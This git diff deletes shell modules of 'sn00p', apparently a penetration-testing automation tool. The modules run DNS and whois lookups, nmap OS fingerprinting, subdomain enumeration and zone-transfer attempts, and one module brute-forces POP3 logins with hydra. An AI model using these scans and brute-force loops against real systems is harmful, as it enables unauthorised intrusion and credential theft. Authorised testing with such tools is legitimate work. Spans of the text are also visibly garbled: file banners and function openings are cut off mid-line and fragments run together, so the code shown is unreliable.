-include_module() -{ - in_host_mods=`echo ${in_modules} | tr -s ' ' '\n' | tr -s '_' ' ' | - awk '$1=="host" {print $2;}'` - - in_tcp_mods=`echo ${in_modules} | tr -s ' ' '\n' | tr -s '_' ' ' | - awk '$1=="tcp" {print $2;}'` - - in_udp_mods=`echo ${in_modules} | tr -s ' ' '\n' | tr -s '_' ' ' | - awk '$1=="udp" {print $2;}'` - - in_web_mods=`echo ${in_modules} | tr -s ' ' '\n' | tr -s '_' ' ' | - awk '$1=="web" {print $2;}'` - - in_lan_mods=`echo ${in_modules} | tr -s ' ' '\n' | tr -s '_' ' ' | - awk '$1=="lan" {print $2;}'` - - in_wlan_mods=`echo ${in_modules} | tr -s ' ' '\n' | tr -s '_' ' ' | - awk '$1=="wlan" {print $2;}'` - - if [ -z "${in_host_mods}" ] - then - in_host_mods="NONE" - fi - if [ -z "${in_tcp_mods}" ] - then - in_tcp_mods="NONE" - fi - if [ -z "${in_udp_mods}" ] - then - in_udp_mods="NONE" - fi - if [ -z "${in_web_mods}" ] - then - in_web_mods="NONE" - fi - if [ -z "${in_lan_mods}" ] - then - in_lan_mods="NONE" - fi - if [ -z "${in_wlan_mods}" ] - then - in_wlan_mods="NONE" - fi - - return ${SUCCESS} -} - -# EOF diff --git a/automation/sn00p/source/src/core/parse.sh b/automation/sn00p/source/src/core/parse.sh deleted file mode 100644 index 9e94ab0..0000000 --- a/automation/sn00p/source/src/core/parse.sh +++ /dev/null @@ -1,240 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_- ${VERBOSE} 2>&1 - - if [ ${usexml} ] - then - protocol="`grep "scaninfo" ${logfile} | cut -d '"' -f 4`" - else - cnt=`grep "/open/tcp/" ${logfile} | wc -l` - if [ ${cnt} -gt 0 ] - then - protocol="tcp" - else - protocol="udp" - fi - fi - - return ${SUCCESS} -} - - -# parse open ports from nmap grepable-logfile -parse_nmap_grepable_ports() -{ - grep "${host}" ${logfile} | tr -s ',: ' '\n' | grep '/' | - ${_sed}'s/\/open.*//g;/filtered|closed|\(|\)|\//d' \ - >> "${host}/${portlist}" - - return ${SUCCESS} -} - - -# parse open ports from nmap xml-logfile -parse_nmap_xml_ports() -{ - # cut relevant xml part to tempfile - ${_sed} "/
/wtmp_${host}" \ - ${logfile} > ${VERBOSE} 2>&1 - - # get ports from tempfile and write to new file - awk '/state="open/ {print $3}' "tmp_${host}" | - tr -d '"><=a-z ' >> "${host}/${portlist}" - - return ${SUCCESS} -} - - -# parse ports from nmap logfiles -parse_nmap_ports() -{ - msg "[*] parsing nmap ports" > ${VERBOSE} 2>&1 - - if [ ${usexml} ] - then - parse_nmap_xml_ports - else - parse_nmap_grepable_ports - fi - - return ${SUCCESS} -} - - -# parse hosts from nmap grepable-logfile -parse_nmap_grepable_hosts() -{ - hosts=`awk '/^Host:/ {print $2}' ${logfile} | uniq` - - return ${SUCCESS} -} - - -# parse hosts from nmap xml-logfile -parse_nmap_xml_hosts() -{ - hosts="`grep "
${VERBOSE} 2>&1 - - if [ ${usexml} ] - then - parse_nmap_xml_hosts - else - parse_nmap_grepable_hosts - fi - - return ${SUCCESS} -} - - -# parse ports from table list -parse_target_ports() -{ - msg "[*] parsing target ports" > ${VERBOSE} 2>&1 - - awk '{print $3}' ${table_list} | tr -s ',' '\n' > ${host}/${portlist} - - return ${SUCCESS} -} - - -# parse network interfaces from list -parse_net_ifs() -{ - netifs="`cut -d ' ' -f 2 ${table_list}`" - - return ${SUCCESS} -} - - -# parse hosts and ports from host list -parse_target_hosts() -{ - msg "[*] parsing target hosts" > ${VERBOSE} 2>&1 - - hosts="`cut -d ' ' -f 2 ${table_list} | tr -d '/'`" - - return ${SUCCESS} -} - - -# parse protocol value from table list -parse_target_protocol() -{ - msg "[*] parsing target protocol" > ${VERBOSE} 2>&1 - - protocol="`grep "${host}" ${table_list} | cut -d ' ' -f 1 | tr -d '\n'`" - - return ${SUCCESS} -} - - -# parse mode options -parse_mode_opts() -{ - shost="`echo ${mode_opts} | tr -s ';' '\n' | grep '^shost' | - cut -d '=' -f 2`" - sport="`echo ${mode_opts} | tr -s ';' '\n' | grep '^sport' | - cut -d '=' -f 2`" - smac="`echo ${mode_opts} | tr -s ';' '\n' | grep '^smac' | - cut -d '=' -f 2`" - dhost="`echo ${mode_opts} | tr -s ';' '\n' | grep '^dhost' | - cut -d '=' -f 2`" - dport="`echo ${mode_opts} | tr -s ';' '\n' | grep '^dport' | - cut -d '=' -f 2`" - dmac="`echo ${mode_opts} | tr -s ';' '\n' | grep '^dmac' | - cut -d '=' -f 2`" - rhost="`echo ${mode_opts} | tr -s ';' '\n' | grep '^rhost' | - cut -d '=' -f 2`" - rport="`echo ${mode_opts} | tr -s ';' '\n' | grep '^rport' | - cut -d '=' -f 2`" - rmac="`echo ${mode_opts} | tr -s ';' '\n' | grep '^rmac' | - cut -d '=' -f 2`" - ndev="`echo ${mode_opts} | tr -s ';' '\n' | grep '^ndev' | cut -d '=' -f 2`" - ssid="`echo ${mode_opts} | tr -s ';' '\n' | grep '^ssid' | cut -d '=' -f 2`" - bssid="`echo ${mode_opts} | tr -s ';' '\n' | grep '^bssid' | - cut -d '=' -f 2`" - cookie="`echo ${mode_opts} | tr -s ';' '\n' | grep '^cookie' | - cut -d '=' -f 2`" - user="`echo ${mode_opts} | tr -s ';' '\n' | grep '^user' | cut -d '=' -f 2`" - pass="`echo ${mode_opts} | tr -s ';' '\n' | grep '^pass' | cut -d '=' -f 2`" - ulists="`echo ${mode_opts} | tr -s ';' '\n' | grep '^ulists' | - cut -d '=' -f 2 | tr -s ',' ' '`" - plists="`echo ${mode_opts} | tr -s ';' '\n' | grep '^plists' | - cut -d '=' -f 2 | tr -s ',' ' '`" - - return ${SUCCESS} -} - - -# parsing options from sn00p config file -parse_conf() -{ - msg "[*] parsing sn00p.conf" > ${VERBOSE} 2>&1 - - if [ -f "${SN00P_PATH}/sn00p.conf" ] - then - ndev=`grep "^NETDEV=" ${SN00P_PATH}/sn00p.conf | cut -d '=' -f 2 | - tr -d '"' | tr -s ',' ' '` - in_modules=`grep "^IN_MODULES=" ${SN00P_PATH}/sn00p.conf | - cut -d '=' -f 2 | tr -d '"' | tr -s ',' ' '` - in_tools=`grep "^IN_TOOLS=" ${SN00P_PATH}/sn00p.conf | cut -d '=' -f 2 | - tr -d '"' | tr -s ',' ' '` - ex_modules=`grep "^EX_MODULES=" ${SN00P_PATH}/sn00p.conf | - cut -d '=' -f 2 | tr -d '"' | tr -s ',' ' '` - ex_tools=`grep "^EX_TOOLS=" ${SN00P_PATH}/sn00p.conf | cut -d '"' -f 2 | - tr -d '"' | tr -s ',' ' '` - user=`grep "^USER=" ${SN00P_PATH}/sn00p.conf | cut -d '"' -f 2 | - tr -d '"' | tr -s ',' ' '` - pass=`grep "^PASS=" ${SN00P_PATH}/sn00p.conf | cut -d '"' -f 2 | - tr -d '"' | tr -s ',' ' '` - ulists=`grep "^USERLISTS=" ${SN00P_PATH}/sn00p.conf | - cut -d '"' -f 2 | tr -d '"' | tr -s ',' ' '` - plists=`grep "^PASSLISTS=" ${SN00P_PATH}/sn00p.conf | - cut -d '"' -f 2 | tr -d '"' | tr -s ',' ' '` - else - error "can't read or find sn00p config file" - fi - - return ${SUCCESS} -} - -# EOF diff --git a/automation/sn00p/source/src/core/target.sh b/automation/sn00p/source/src/core/target.sh deleted file mode 100644 index ad8f1e9..0000000 --- a/automation/sn00p/source/src/core/target.sh +++ /dev/null @@ -1,155 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_- ${VERBOSE} 2>&1 - - if [ "${in_tcp_mods}" != "NONE" ] - then - echo ${in_tcp_mods} | tr -s ' ' '\n' > "${tmplist}" - fi - - if [ "${ex_tcp_mods}" != "NONE" ] - then - grep -v "`echo ${ex_tcp_mods} | tr -s ' ' '\n'`" "${host}/${portlist}" | - tee ${tmplist} > ${VERBOSE} 2>&1 - fi - - if [ "${in_udp_mods}" != "NONE" ] - then - echo ${in_udp_mods} | tr -s ' ' '\n' > "${tmplist}" - fi - - if [ "${ex_udp_mods}" != "NONE" ] - then - grep -v "`echo ${ex_udp_mods} | tr -s ' ' '\n'`" "${host}/${portlist}" \ - > "${tmplist}" > ${VERBOSE} 2>&1 - fi - - # delete lines with default and move to final portlist file - if [ -f "${tmplist}" ] - then - sed '/^default/d' < ${tmplist} > "${host}/${portlist}" - fi - - return ${SUCCESS} -} - - -# create a new portlist from nmap logfile -make_nmap_port_list() -{ - parse_nmap_protocol - portlist="${protocol}_port.lst" - parse_nmap_ports - - return ${SUCCESS} -} - - -# create a portlist from command line list -make_target_port_list() -{ - parse_target_protocol - check_protocol - portlist="${protocol}_port.lst" - parse_target_ports - - return ${SUCCESS} -} - - -# create a new port list from nmap logfile or command line list -make_port_list() -{ - msg "[*] making port list" > ${VERBOSE} 2>&1 - - for host in ${hosts} - do - if [ ${logfile} ] - then - make_nmap_port_list - else - make_target_port_list - fi - - filter_port_list - done - - return ${SUCCESS} -} - - -# create a table of list in a temporary file, so we can parse later -# each row's entry and use it for target_list, net_list, etc. -make_table_list() -{ - msg "[*] making target table list" > ${VERBOSE} 2>&1 - - list="${1}" - table_list="table.lst" - - echo ${list} | awk -F ';' '{for (i=1; i<=NF; i++) - {split($i, a, /:\/*/); print a[1] " " a[2] " " a[3]}}' > ${table_list} - - return ${SUCCESS} -} - - -# create network interface directories -make_net_dirs() -{ - for netif in ${netifs} - do - mkdir ${netif} > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -# create host directories -make_host_dirs() -{ - msg "[*] making host list" > ${VERBOSE} 2>&1 - - for host in ${hosts} - do - mkdir ${host} > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - -# EOF diff --git a/automation/sn00p/source/src/modules/host/default.sh b/automation/sn00p/source/src/modules/host/default.sh deleted file mode 100644 index 569ed26..0000000 --- a/automation/sn00p/source/src/modules/host/default.sh +++ /dev/null @@ -1,254 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# check, if ${DHOST} is a hostname -check_hostname() -{ - # enough for testing, since ip address don't include a-z or A-Z - if echo ${DHOST} | grep "[a-zA-Z]" > ${VERBOSE} 2>&1 - then - hostname="${TRUE}" - fi - - return ${SUCCESS} -} - - -# get ipv4 address directly via ${DHOST} or via dns request for A record -# TOOLS: host -do_ipv4addr() -{ - if [ ${hostname} ] - then - host -t A ${DHOST} 2>&1 | awk '{print $(NF)}' - else - echo "${DHOST}" 2>&1 - fi - - return ${SUCCESS} -} - - -# get ipv6 address directly via ${DHOST} or via dns request for AAAA record -# TOOLS: host -do_ipv6addr() -{ - if [ ${hostname} ] - then - host -t AAAA ${DHOST} 2>&1 | awk '/IPv6 address/ {print $5}' - else - echo "${DHOST}" 2>&1 - fi - - return ${SUCCESS} -} - - -# get hostname directly via ${DHOST} or via dns request for PTR record -# TOOLS: host -do_hostname() -{ - if [ ${hostname} ] - then - echo "${DHOST}" 2>&1 - else - host -t PTR ${DHOST} 2>&1 | - awk '/pointer/ {sub(/[.]$/, ""); print $(NF)}' - fi - - return ${SUCCESS} -} - - -# get domainname directly via ${DHOST} or via dns request for PTR record -# TOOLS: host -do_domain() -{ - domain="`echo ${DHOST} | awk -F'.' '{print $(NF)}'`" - - if [ ! -z "${domain}" ] - then - echo "${DHOST}" 2>&1 - else - host -t PTR ${DHOST} 2>&1 | - awk '/pointer/ {num=split($0, a, "."); print a[num-2] "." a[num-1]}' - fi - - return ${SUCCESS} -} - - -# get ip address range -# TOOLS: whois -do_iprange() -{ - if [ ${hostname} ] - then - whois `head -1 ipv4addr.log` 2>&1 | - awk '/inetnum|NetRange/ {print $2"-"$4}' | head -1 - else - whois ${DHOST} 2>&1 | awk '/inetnum|NetRange/ {print $2"-"$4}' | - head -1 - fi - - return ${SUCCESS} -} - - -# get nameservers (ns records) -# TOOLS: host -do_nameserver() -{ - host -t NS `head -1 domain.log` 2>&1 | - awk '/name server/ {sub(/[.]$/, ""); print $(NF)}' - - return ${SUCCESS} -} - - -# get mailserver (mx records) -# TOOLS: host -do_mailserver() -{ - if [ ${hostname} ] - then - # try via hostname - host -t MX `head -1 hostname.log` 2>&1 | - awk '/is handled/ {sub(/[.]$/, ""); print $(NF)}' - else - # try via ipv4 address - host -t MX `head -1 ipv4addr.log` 2>&1 | - awk '/is handled/ {sub(/[.]$/, ""); print $(NF)}' - fi - - # try via domain - host -t MX `head -n 1 domain.log` 2>&1 | - awk '/is handled/ {sub(/[.]$/, ""); print $(NF)}' - - return ${SUCCESS} -} - - -# check for hostname/ipaddr first -check_hostname - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/host/fingerprint.sh b/automation/sn00p/source/src/modules/host/fingerprint.sh deleted file mode 100644 index ed5a535..0000000 --- a/automation/sn00p/source/src/modules/host/fingerprint.sh +++ /dev/null @@ -1,150 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# fingerprint OS using nmap -# TOOLS: nmap -do_nmap_os() -{ - # default ports in hope that they are open and port 1 as closed port - opts="-n -sT -P0 -O --osscan-guess -p 21,22,23,25,53,80,443,110,111,113" - opts="${opts},143,993,995,443,8000,8080 --open" - - nmap ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - -# fingerprint OS using sinfp3 -# TOOLS: sinfp -do_sinfp() -{ - #opts="-port 21,22,23,25,53,80,110,111,113,143,993,995,443,8000,8080" - opts="${opts} -port ${DPORT} -input-ipport -retry 2 -output-console" - opts="${opts} -db-file /usr/share/sinfp3/sinfp3.db" - - sinfp -target ${DHOST} ${opts} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/host/subdomainscan.sh b/automation/sn00p/source/src/modules/host/subdomainscan.sh deleted file mode 100644 index 50f8c0f..0000000 --- a/automation/sn00p/source/src/modules/host/subdomainscan.sh +++ /dev/null @@ -1,181 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# globals -domain_log="../default/domain.log" - - -# scan for subdomains using dnsspider.py over udp -# TOOLS: dnsspider -do_dnsspider() -{ - opts="-t 0 -x 64" - - dnsspider ${opts} -a `head -1 ${domain_log}` 2>&1 - - return ${SUCCESS} -} - - -# scan for subdomains using ripdc.py via IP address -# TOOLS: ripdc -do_ripdc_ip() -{ - ripdc -t ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# scan for subdomains using ripdc.py via domain name -# TOOLS: ripdc -do_ripdc_domain() -{ - ripdc -t `head -1 ${domain_log}` 2>&1 - - return ${SUCCESS} -} - - -# scan for subdomains using dnsenum -# TOOLS: dnsenum -do_dnsenum() -{ - opts="--threads 16" - - dnsenum ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# scan for subdomains and (sub-)directories using spidy -# TOOLS: spidy.sh -do_spidy() -{ - spidy.sh `head -1 ${domain_log}` 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/host/tracehost.sh b/automation/sn00p/source/src/modules/host/tracehost.sh deleted file mode 100644 index 96693af..0000000 --- a/automation/sn00p/source/src/modules/host/tracehost.sh +++ /dev/null @@ -1,157 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# trace the route to target using traceroute -# TOOLS: traceroute -do_traceroute() -{ - opts="-q 2 -w 3 -4" - - traceroute ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# trace the route to target using tcptraceroute -# TOOLS: tcptraceroute -do_tcptraceroute() -{ - opts="-q 2 -w 1" - - tcptraceroute ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# trace the route to target using tracepath -# TOOLS: tracepath -do_tracepath() -{ - tracepath -n ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/host/whois.sh b/automation/sn00p/source/src/modules/host/whois.sh deleted file mode 100644 index efc448a..0000000 --- a/automation/sn00p/source/src/modules/host/whois.sh +++ /dev/null @@ -1,151 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# whois domain -# TOOLS: whois -do_whois_domain() -{ - for i in `cat ../default/domain.log 2>&1` - do - whois ${i} 2>&1 - echo "" - done - - return ${SUCCESS} -} - - -# whois ip addr -# TOOLS: whois -do_whois_ip() -{ - for i in `cat ../default/ipv4addr.log 2>&1` - do - whois ${i} 2>&1 - echo "" - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/host/zonetransfer.sh b/automation/sn00p/source/src/modules/host/zonetransfer.sh deleted file mode 100644 index 194e620..0000000 --- a/automation/sn00p/source/src/modules/host/zonetransfer.sh +++ /dev/null @@ -1,184 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# we need in most of our routines, so we make global -domain="../default/domain.log" -nameserver="../default/nameserver.log" - - -# dns zone transfer via host -# TOOLS: host -do_zonetransfer_host() -{ - for domain in `cat ${domain}` - do - for nameserver in `cat ${nameserver}` - do - host -l "${domain}" "${nameserver}" 2>&1 - done - done - - return ${SUCCESS} -} - - -# dns zone transfer via dig -# TOOLS: dig -do_zonetransfer_dig() -{ - for domain in `cat ${domain}` - do - for nameserver in `cat ${nameserver}` - do - dig axfr "@${nameserver}" "${domain}" 2>&1 - done - done - - return ${SUCCESS} -} - - -# dns zone transfer via dnswalk -# TOOLS: dnswalk -do_dnswalk() -{ - opts="-F" - - for domain in `cat ${domain}` - do - dnswalk ${opts} "${domain}." 2>&1 - done - - return ${SUCCESS} -} - -# dns zone transfer via dnsenum -# TOOLS: dnsenum -do_dnsenum() -{ - dnsenum ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/lan/default.sh b/automation/sn00p/source/src/modules/lan/default.sh deleted file mode 100644 index 70b45c6..0000000 --- a/automation/sn00p/source/src/modules/lan/default.sh +++ /dev/null @@ -1,261 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# check if ip utils is installed -check_ip_utils() -{ - str=`ip 2> /dev/stdout | head -1 | cut -d ' ' -f 1` - - if [ "${str}" = "Usage:" ] - then - iputil="ip" - fi - - return ${SUCCESS} -} - - -# get source ip address -# TOOLS: ifconfig ip -do_srcip() -{ - if [ -z "${SHOST}" ] - then - if [ "${iputil}" = "ip" ] - then - ip a show dev ${NDEV} | awk '/inet / {print $2}' | sed 's/\/.*//g' \ - 2>&1 - else - ifconfig ${NDEV} | awk '/inet / {print $2}' 2>&1 - fi - else - echo "${SHOST}" 2>&1 - fi - - return ${SUCCESS} -} - - -# get source mac address -# TOOLS: ifconfig -do_srcmac() -{ - if [ -z "${SMAC}" ] - then - if [ "${iputil}" = "ip" ] - then - ip a show dev ${NDEV} | grep "link/ether" | awk '{print $2}' 2>&1 - else - if [ `uname` = "OpenBSD" ] - then - ifconfig ${NDEV} | awk '/lladdr / {print $2}' 2>&1 - else - ifconfig ${NDEV} | awk '/ether / {print $2}' 2>&1 - fi - fi - else - echo "${SMAC}" 2>&1 - fi - - return ${SUCCESS} -} - - -# get subnet mask -# TOOLS: ifconfig -do_subnetmask() -{ - #if [ "${iputil}" = "ip" ] - #then - # ip dev ${NDEV} 2>&1 - #else - #ifconfig ${NDEV} | awk '/inet / {print $4}' 2>&1 - #fi - - ifconfig ${NDEV} | awk '/inet / {print $4}' 2>&1 - - return ${SUCCESS} -} - - -# get broadcast address -# TOOLS: ifconfig -do_broadcast() -{ - if [ "${iputil}" = "ip" ] - then - ip a show dev ${NDEV} | grep '\' | awk '{print $4}' 2>&1 - else - ifconfig ${NDEV} | awk '/inet / {print $6}' 2>&1 - fi - - return ${SUCCESS} -} - - -# get ip address of router for default route -# TOOLS: netstat -do_routerip() -{ - if [ -z "${RHOST}" ] - then - if [ `uname` = "SunOS" ] - then - netstat -rn | grep "${NDEV}" | grep "default" | tr -s ' ' '-' | - cut -d '-' -f 2 - else - if [ "${iputil}" = "ip" ] - then - ip route | grep 'default' | cut -d ' ' -f 3 2>&1 - else - netstat -rn | grep "${NDEV}" | grep "^0.0.0.0" | - awk '{print $2}' 2>&1 - fi - fi - else - echo "${RHOST}" 2>&1 - fi - - return ${SUCCESS} -} - - -# get mac address of router -# TOOLS: arp -do_routermac() -{ - rhost="`head -1 routerip.log 2> /dev/null`" - - if [ -z "${RMAC}" ] - then - arp -an | grep "\<${rhost}\>" | cut -d ' ' -f 4 2>&1 - else - echo "${RMAC}" 2>&1 - fi - - return ${SUCCESS} -} - - -check_ip_utils - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/110.sh b/automation/sn00p/source/src/modules/tcp/110.sh deleted file mode 100644 index 87b1fd5..0000000 --- a/automation/sn00p/source/src/modules/tcp/110.sh +++ /dev/null @@ -1,142 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# bruteforce default logins via hydra -# TOOLS: hydra -do_hydra_pop3() -{ - opts="-e nsr -f -v" - - for user in ${ULISTS} - do - for pass in ${PLISTS} - do - hydra ${opts} -L ${user} -P ${pass} pop3://${DHOST}:${DPORT} 2>&1 - done - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/111.sh b/automation/sn00p/source/src/modules/tcp/111.sh deleted file mode 100644 index fced537..0000000 --- a/automation/sn00p/source/src/modules/tcp/111.sh +++ /dev/null @@ -1,147 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} 